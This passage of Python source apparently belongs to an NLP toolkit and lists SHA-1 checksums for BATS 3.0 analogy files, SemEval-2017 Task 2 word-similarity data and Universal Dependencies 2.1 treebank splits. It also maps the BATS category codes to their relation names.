'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':\n '377777c1e793c638e72c010228156d01f916708e',\n 'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':\n '051c0c3c633e10900f827991dac14cf76da7f022',\n 'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':\n '5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',\n 'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':\n '80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',\n 'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':\n '223e120bd61b3116298a253f392654c15ad5a39a',\n 'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':\n 'a56f8685af489bcd09c36f864eba1657ce0a7c28',\n 'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':\n '5da99b1f1781ecfb4a1a7448c715abf07451917b',\n 'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':\n '4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',\n 'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':\n 'a6218162bc257d98e875fc667c23edfac59e19fd',\n 'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':\n '9a4236c3bbc23903e101a42fb5ad6e15e552fadf',\n 'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':\n '3ab0153926d5cf890cf08a4077da6d9946133874',\n 'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':\n '2a012b87a9a60e128e064c5fe24b60f99e16ddce',\n 'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':\n '9890315d3c4e6a38b8ae5fc441858564be3d3dc4',\n 'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':\n 'ef08a00e8ff7802811ace8f00fabac41b5d03678',\n 'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':\n '754957101c93a25b438785bd4458404cd9010259',\n 'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':\n '71a6562c34fb6154992a7c3e499375fcc3529c96',\n 'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':\n 'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',\n 'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':\n '12d5b51c7b76b9136eadc719abc8cf4806c67b73',\n 'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':\n '91991b007a35f45bd42bd7d0d465c6f8311df911',\n 'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':\n 'e5af11e216db392986ba0cbb597d861066c29adb',\n 'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':\n 'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',\n 'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':\n '247a588671bc1da8f615e14076bd42573d24b4b3',\n 'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':\n '4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',\n 'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':\n '83d5ecad78d9de28fd70347731c7ee5918ba43c9',\n 'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - 
misc].txt':\n 'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',\n 'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':\n 'c081e1104e1b40725063f4b39d13d1ec12496bfd',\n 'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':\n 'bcbf05f3be76cef990a74674a9999a0bb9790a07',\n 'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':\n '2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',\n 'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':\n '8fa287860b096bef004fe0f6557e4f686e3da81a',\n 'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':\n 'a17c591961bddefd97ae5df71f9d1559ce7900f4',\n 'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':\n '117fbb86504c192b33a5469f2f282e741d9c016d',\n 'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':\n '3cde2f2c2a0606777b8d7d11d099f316416a7224'}\n\nBATS_CATEGORIES = {\n 'I01': '[noun - plural_reg]',\n 'I02': '[noun - plural_irreg]',\n 'I03': '[adj - comparative]',\n 'I04': '[adj - superlative]',\n 'I05': '[verb_inf - 3pSg]',\n 'I06': '[verb_inf - Ving]',\n 'I07': '[verb_inf - Ved]',\n 'I08': '[verb_Ving - 3pSg]',\n 'I09': '[verb_Ving - Ved]',\n 'I10': '[verb_3pSg - Ved]',\n 'D01': '[noun+less_reg]',\n 'D02': '[un+adj_reg]',\n 'D03': '[adj+ly_reg]',\n 'D04': '[over+adj_reg]',\n 'D05': '[adj+ness_reg]',\n 'D06': '[re+verb_reg]',\n 'D07': '[verb+able_reg]',\n 'D08': '[verb+er_irreg]',\n 'D09': '[verb+tion_irreg]',\n 'D10': '[verb+ment_irreg]',\n 'E01': '[country - capital]',\n 'E02': '[country - language]',\n 'E03': '[UK_city - county]',\n 'E04': '[name - nationality]',\n 'E05': '[name - occupation]',\n 'E06': '[animal - young]',\n 'E07': '[animal - sound]',\n 'E08': '[animal - shelter]',\n 'E09': '[things - color]',\n 'E10': '[male - female]',\n 'L01': '[hypernyms - animals]',\n 'L02': '[hypernyms - misc]',\n 'L03': '[hyponyms - misc]',\n 'L04': '[meronyms - substance]',\n 'L05': '[meronyms - member]',\n 'L06': '[meronyms - part]',\n 'L07': '[synonyms - intensity]',\n 'L08': '[synonyms - exact]',\n 'L09': '[antonyms - gradable]',\n 'L10': '[antonyms - binary]'\n}\n\nSEMEVAL17_CHECKSUMS = \\\n {'SemEval17-Task2/README.txt':\n 'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',\n 'SemEval17-Task2/task2-scorer.jar':\n '145ef73ce955656d59e3b67b41f8152e8ee018d8',\n 'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':\n '6fc840f989d2274509549e472a68fb88dd2e149f',\n 'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':\n '05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',\n 'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':\n '552904b5988f9951311290ca8fa0441dd4351d4b',\n 'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':\n '29d5970feac5982961bd6ab621ba31f83d3bff77',\n 'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':\n 'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':\n 'c51463460495a242cc726d41713c5e00b66fdd18',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':\n '2d2bb2ed41308cc60e7953cc9036f7dc89141b48',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':\n 'a5842ff17fe3847d15414924826a8eb236018bcc',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':\n '717bbe035d8ae2bad59416eb3dd4feb7238b97d4',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':\n 'a342b950109c73afdc86a7829e17c1d8f7c482f0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':\n 
'ef92b1375762f68c700e050d214d3241ccde2319',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':\n '17aa103981f3193960309bb9b4cc151acaf8136c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':\n 'eced15e8565689dd67605a82a782d19ee846222a',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':\n '5cb69370a46385a7a3d37cdf2018744be77203a0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':\n '402f7fed52b60e915fb1be49f935395488cf7a7b',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':\n '9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':\n 'd3b37aac79ca10311352309ef9b172f686ecbb80',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':\n 'a2959aec346c26475a4a6ad4d950ee0545f2381e',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':\n 'ca627c30143d9f82a37a8776fabf2cee226dd35c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':\n 'a03d79a6ce7b798356b53b4e85dbe828247b97ef',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':\n '7564130011d38daad582b83135010a2a58796df6',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':\n 'c9e23c2e5e970e7f95550fbac3362d85b82cc569',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':\n 'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':\n '428dfdad2a144642c13c24b845e6b7de6bf5f663',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':\n '1dd7ab08a10552486299151cdd32ed19b56db682',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':\n '17451ac2165aa9b695dae9b1aba20eb8609fb400',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':\n '5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':\n '8c09a219670dc32ab3864078bf0c28a287accabc',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':\n 'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':\n 'e0b560bb1d2db39ce45e841c8aad611734dc94f1',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':\n 'dd071fd90f59bec8d271a447d86ee2e462941f52',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':\n 'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':\n '8956c78ff9ceae1d923a57816e55392c6a7dfc49',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':\n '2f7c4247cde0d918b3508e90f6b49a1f5031c81b',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':\n 'c11e0b5b55f94fc97c7b11fa455e71b071be879f',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':\n 'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':\n '693cb5928e807c79e39136dc0981dadca7832ae6',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':\n '8241ca66bf5ba55f77607e9bcfae8e34902715d8',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':\n 'd30701a93c8c5500b82ac2334ed8410f9a23864b',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':\n 'bad225573e1216ba8b35429e9fa520a20e8ce031',\n 
'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt':\n 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':\n 'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':\n '88a6f6dd1bba309f7cae7281405e37f442782983',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':\n 'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':\n '128d1a460fe9836b66f0fcdf59455b02edb9f258',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':\n '508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':\n '1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':\n '141c83d591b0292016583d9c23a2cc5514a006aa',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':\n 'a0a548cd698c389ee80c34d6ec72abed5f1625e5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':\n '8d42bed8a43ff93d26ca95794758d9392ca707ed',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':\n '9c85223f1f734de61c28157df0ce417bb0537803',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':\n '126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':\n '1db6201c2c8f19744c39dbde8bd4a803859d64c1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':\n '5300bf2ead163ff3981fb41ec5d0e291c287c9e0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':\n 'd4f5205de929bb0c4020e1502a3f2204b5accd51',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':\n '3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':\n 'c14de7bf326907336a02d499c9b92ab229f3f4f8',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':\n '3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':\n '359f69e9dfd6411a936baa3392b8f05c398a7707',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':\n '44090607fabe5a26926a384e521ef1317f6f00d0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':\n '97b09ffa11803023c2143fd4a4ac4bbc9775e645',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt':\n 
'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt':\n 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt':\n 'a0735361a692be357963959728dacef85ea08240'}\n\nUD21_DATA_FILE_SHA1 = \\\n {'af': {'dev': ('af-ud-dev.conllu',\n 'e37b104f4425ee00afc81779201816d5ac525194'),\n 'test': ('af-ud-test.conllu',\n 'd2bf02370d308ee957c04242bd0871db0e488389'),\n 'train': ('af-ud-train.conllu',\n 'a652c7b19c236063d3ea489947f83095893b699a')},\n 'grc_proiel': {'dev': ('grc_proiel-ud-dev.conllu',\n 'd199530c7e40ff0214e510957bb126af0dc12c1c'),\n 'test': ('grc_proiel-ud-test.conllu',\n 'bb7825ddeb18fc2d86638e4725f04563f3e08aab'),\n 'train': ('grc_proiel-ud-train.conllu',\n 'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')},\n 'grc': {'dev': ('grc-ud-dev.conllu',\n 'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),\n 'test': ('grc-ud-test.conllu',\n 'f19accf31db95e2c736d716d3438c09aa877eb07'),\n 'train': ('grc-ud-train.conllu',\n 'e98d3eabea67787c5d43a498f5a0fa4246f38104')},\n 'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',\n 'b740de9bd68e68b30b9b313eb050d44e94470ca5'),\n 'test': ('ar_nyuad-ud-test.conllu',\n 'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),\n 'train': ('ar_nyuad-ud-train.conllu',\n 'd065f03958fd8782a7431b6778c6665ad09444a6')},\n 'ar_pud': {'test': ('ar_pud-ud-test.conllu',\n '2161701e6726b6feb14733a312fba6160b9eb722')},\n 'ar': {'dev': ('ar-ud-dev.conllu',\n '5f8964974d5ba5eb3504cdafb93c34c473c4177c'),\n 'test': ('ar-ud-test.conllu',\n '58df161047f310cc3bb4d0e615ca33466e630bb9'),\n 'train': ('ar-ud-train.conllu',\n '0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')},\n 'eu': {'dev': ('eu-ud-dev.conllu',\n '3ee15b5ed46ec93d7278c8cc0351d242417d553d'),\n 'test': ('eu-ud-test.conllu',\n 'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),\n 'train': ('eu-ud-train.conllu',\n 'd56ec997916e38ee6ab1badd78c119e81e4797c9')},\n 'be': {'dev': ('be-ud-dev.conllu',\n '015473e91cf8937c46e8b721f206415abac16a35'),\n 'test': ('be-ud-test.conllu',\n 'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),\n 'train': ('be-ud-train.conllu',\n '26b871e28d2f356a709f106b6e3e86b417ba74e7')},\n 'bg': {'dev': ('bg-ud-dev.conllu',\n '0a2284b10547681eb65691eb2a9f0f1662e16e90'),\n 'test': ('bg-ud-test.conllu',\n '75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),\n 'train': ('bg-ud-train.conllu',\n 'd4b2fa267010c4486885c91f3af65ff66c8be94c')},\n 'bxr': {'sample': ('bxr-ud-sample.conllu',\n '9239bdd251a60820c71111ec54de9e7d58a8579d'),\n 'test': ('bxr-ud-test.conllu',\n '0a06e527454ae0b547153222f67eb5db94e528fd')},\n 'yue': {'test': ('yue-ud-test.conllu',\n 'd91477c65aa75cd45489cca13f7a122066972bdb')},\n 'ca': {'dev': ('ca-ud-dev.conllu',\n '5737824f0afff0d07a43db331f102d62c6da2d96'),\n 'test': ('ca-ud-test.conllu',\n '0e28bd2a3b982515c1158194ad52bcbbe741e170'),\n 'train': ('ca-ud-train.conllu',\n 'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')},\n 'zh_cfl': {'test': ('zh_cfl-ud-test.conllu',\n 
'32fe45cd0e4e11ced95202971bce74acbc6a8c30')},\n 'zh_hk': {'test': ('zh_hk-ud-test.conllu',\n '4c75fa5bbcdcb181447b4e037224d50feb2776fb')},\n 'zh_pud': {'test': ('zh_pud-ud-test.conllu',\n 'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},\n 'zh': {'dev': ('zh-ud-dev.conllu',\n '34d8253b35ad2245d59ddffa71b5689ef267b6b2'),\n 'test': ('zh-ud-test.conllu',\n '0f00516097650c12262298dd0fbd1b17a6d2bfe2'),\n 'train': ('zh-ud-train.conllu',\n '9444eec5f4561f289ad140e47e49013689512a65')},\n 'cop': {'dev': ('cop-ud-dev.conllu',\n '863d1004df1a92df52515105f6fae6ff68539595'),\n 'test': ('cop-ud-test.conllu',\n 'd3b33566679f071d4ad622ad840cd98381835706'),\n 'train': ('cop-ud-train.conllu',\n '33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},\n 'hr': {'dev': ('hr-ud-dev.conllu',\n '8da2a419980807d2e91e09b6bf496e58d442b0ba'),\n 'test': ('hr-ud-test.conllu',\n '49d673cba3d32d39d413e557276a45a0214ed83e'),\n 'train': ('hr-ud-train.conllu',\n 'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')},\n 'cs_cac': {'dev': ('cs_cac-ud-dev.conllu',\n '69dfed28c29146b41a3428f4715bde70a6aecf00'),\n 'test': ('cs_cac-ud-test.conllu',\n 'a994b33ebbde486c1818a9df460fb112055e95de'),\n 'train': ('cs_cac-ud-train.conllu',\n '694f8559471dc481612606bf5df078daa094a84e')},\n 'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',\n 'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'),\n 'test': ('cs_cltt-ud-test.conllu',\n 'a8f6696785e658471f759bc736b738a105cba9a3'),\n 'train': ('cs_cltt-ud-train.conllu',\n 'ab97886066bfa462e5da03d25f802489292c0b56')},\n 'cs_fictree': {'dev': ('cs_fictree-ud-dev.conllu',\n 'dc67c07737a3a8bf2633068941f2d55f1500e192'),\n 'test': ('cs_fictree-ud-test.conllu',\n '06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'),\n 'train': ('cs_fictree-ud-train.conllu',\n 'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')},\n 'cs_pud': {'test': ('cs_pud-ud-test.conllu',\n '9f205677041de694157ba2ef3e1eadb44d467f2f')},\n 'cs': {'dev': ('cs-ud-dev.conllu',\n 'd609e895b21b8710337e23a98b58ffd7b7a54bf1'),\n 'test': ('cs-ud-test.conllu',\n '34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),\n 'train': ('cs-ud-train.conllu',\n 'd1f855798a29d433b580d01ade0d8d062cd58534')},\n 'da': {'dev': ('da-ud-dev.conllu',\n '2c0c798c20a2efb30273172d388342a82bb0ce3c'),\n 'test': ('da-ud-test.conllu',\n '85a95a8527f8773f1575ceaf0ab51f204b211047'),\n 'train': ('da-ud-train.conllu',\n 'b653c029a7ae5c106f865dcef949fb3fe2aa0420')},\n 'nl_lassysmall': {'dev': ('nl_lassysmall-ud-dev.conllu',\n '2a169af74c2206c9073c3932b4a300492a314ee5'),\n 'test': ('nl_lassysmall-ud-test.conllu',\n '39f08896a40ad370f2acc37d58689cdc43a660a9'),\n 'train': ('nl_lassysmall-ud-train.conllu',\n 'e4fd6bac246c81bb17a3c932e251b8662739cc19')},\n 'nl': {'dev': ('nl-ud-dev.conllu',\n '33a9387eef9f5c0b15bd1e76e78776863f1f6d90'),\n 'test': ('nl-ud-test.conllu',\n '01b3e1048792c851fdd59882c353fcdb76dc165e'),\n 'train': ('nl-ud-train.conllu',\n '8e6a10152b7d09ce61433dd5f715ab2401611cf6')},\n 'en_lines': {'dev': ('en_lines-ud-dev.conllu',\n '83b63b7670ea4394b558bc26e16a004339f0a0ef'),\n 'test': ('en_lines-ud-test.conllu',\n 'ccc9d3c71a873313d138c3adb12405a97eb270d8'),\n 'train': ('en_lines-ud-train.conllu',\n 'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')},\n 'en_pud': {'test': ('en_pud-ud-test.conllu',\n '4a9c83ba058a7e51979af790ba0440cc274b948f')},\n 'en_partut': {'dev': ('en_partut-ud-dev.conllu',\n '863a6f571158acaaca95223e50bd08fc0c1134f0'),\n 'test': ('en_partut-ud-test.conllu',\n '0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'),\n 'train': ('en_partut-ud-train.conllu',\n 'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18')},\n 'en': {'dev': 
('en-ud-dev.conllu',\n 'e2159dda4400d289ad8a403b466c8d23d733ba35'),\n 'test': ('en-ud-test.conllu',\n 'bd36ef23f76155625b379d063427bd62f19b7658'),\n 'train': ('en-ud-train.conllu',\n '993c44f62104971fe2d056847349facbb7986258')},\n 'et': {'dev': ('et-ud-dev.conllu',\n '312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'),\n 'test': ('et-ud-test.conllu',\n 'd70907f0771b41a27406672b9d91043a0954f946'),\n 'train': ('et-ud-train.conllu',\n 'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')},\n 'fi_ftb': {'dev': ('fi_ftb-ud-dev.conllu',\n '552ec574acdb3209e7545af4e16a43a1e2956979'),\n 'test': ('fi_ftb-ud-test.conllu',\n '13c34838a0fa9e379f9624ed1f4c368ca50a7d98'),\n 'train': ('fi_ftb-ud-train.conllu',\n '73d025250bfc82a24181b5ed601dc4ae7c8e846c')},\n 'fi_pud': {'test': ('fi_pud-ud-test.conllu',\n '4ab7b0d99ce6697d79732e401be97585a28c2afa')},\n 'fi': {'dev': ('fi-ud-dev.conllu',\n 'e023cf7eaffbda20bd4518d87fe9086207bb5361'),\n 'test': ('fi-ud-test.conllu',\n 'fd57c5106e43994250f4472890572bdbb8b4a48b'),\n 'train': ('fi-ud-train.conllu',\n 'ab27bda8cbb62886196b78de87985a4c6cf8215d')},\n 'fr_ftb': {'dev': ('fr_ftb-ud-dev.conllu',\n '71b3cc02601f64711f98e33a6b2af10aa00700be'),\n 'test': ('fr_ftb-ud-test.conllu',\n '723b8c44e74202a18b7e71268b738a5e1aa15f86'),\n 'train': ('fr_ftb-ud-train.conllu',\n '9a347120478254647deb7c7e02871b28aad23ec4')},\n 'fr_pud': {'test': ('fr_pud-ud-test.conllu',\n '570b7e31dc359ed62123bea6546efa13cfc2cf25')},\n 'fr_partut': {'dev': ('fr_partut-ud-dev.conllu',\n '1505030048829a8dccc466cc86bca057996301ae'),\n 'test': ('fr_partut-ud-test.conllu',\n 'f6446317c9f82cc0b70a76be75282804a3359ac0'),\n 'train': ('fr_partut-ud-train.conllu',\n 'f87c246cfa91186b90c7780cb64783034f196622')},\n 'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',\n '859b10d80c7b3a382571cce9b2620039673539d1'),\n 'test': ('fr_sequoia-ud-test.conllu',\n 'be0ef69e392e64030414748da2995433f23e033d'),\n 'train': ('fr_sequoia-ud-train.conllu',\n '48ac01913518888a32670a687123ed1bac57e0e9')},\n 'fr': {'dev': ('fr-ud-dev.conllu',\n '5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'),\n 'test': ('fr-ud-test.conllu',\n 'd20a014acd38193155a33a5233c13f89541c78c3'),\n 'train': ('fr-ud-train.conllu',\n 'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')},\n 'gl_treegal': {'dev': ('gl_treegal-ud-dev.conllu',\n '272558614cff4a5e1f2805626904e6dc488b8d25'),\n 'test': ('gl_treegal-ud-test.conllu',\n '18d99474d3aa9c83878c42a79d7881330dd9b861'),\n 'train': ('gl_treegal-ud-train.conllu',\n 'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')},\n 'gl': {'dev': ('gl-ud-dev.conllu',\n 'e72390dce9bf973442deef31ed0cd7a975361fe5'),\n 'test': ('gl-ud-test.conllu',\n '7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),\n 'train': ('gl-ud-train.conllu',\n 'd586e7bffa314f8c5b85288e060e68dddc1f5d33')},\n 'de_pud': {'test': ('de_pud-ud-test.conllu',\n '2c91e42b7345145290b68385ff5270910048b8c4')},\n 'de': {'dev': ('de-ud-dev.conllu',\n '9b4f49bfa2b609d54369890d9e7d8d24a3c229af'),\n 'test': ('de-ud-test.conllu',\n '48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),\n 'train': ('de-ud-train.conllu',\n '04a1d6a6a2da9d9c38496118e0432c9a6720db64')},\n 'got': {'dev': ('got-ud-dev.conllu',\n '501c47193ca2af5826e4afcc04941df87a7c47c3'),\n 'test': ('got-ud-test.conllu',\n 'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'),\n 'train': ('got-ud-train.conllu',\n 'b4951ede89d947c6617df782ac248566235f78fb')},\n 'el': {'dev': ('el-ud-dev.conllu',\n '9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'),\n 'test': ('el-ud-test.conllu',\n '1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),\n 'train': ('el-ud-train.conllu',\n 
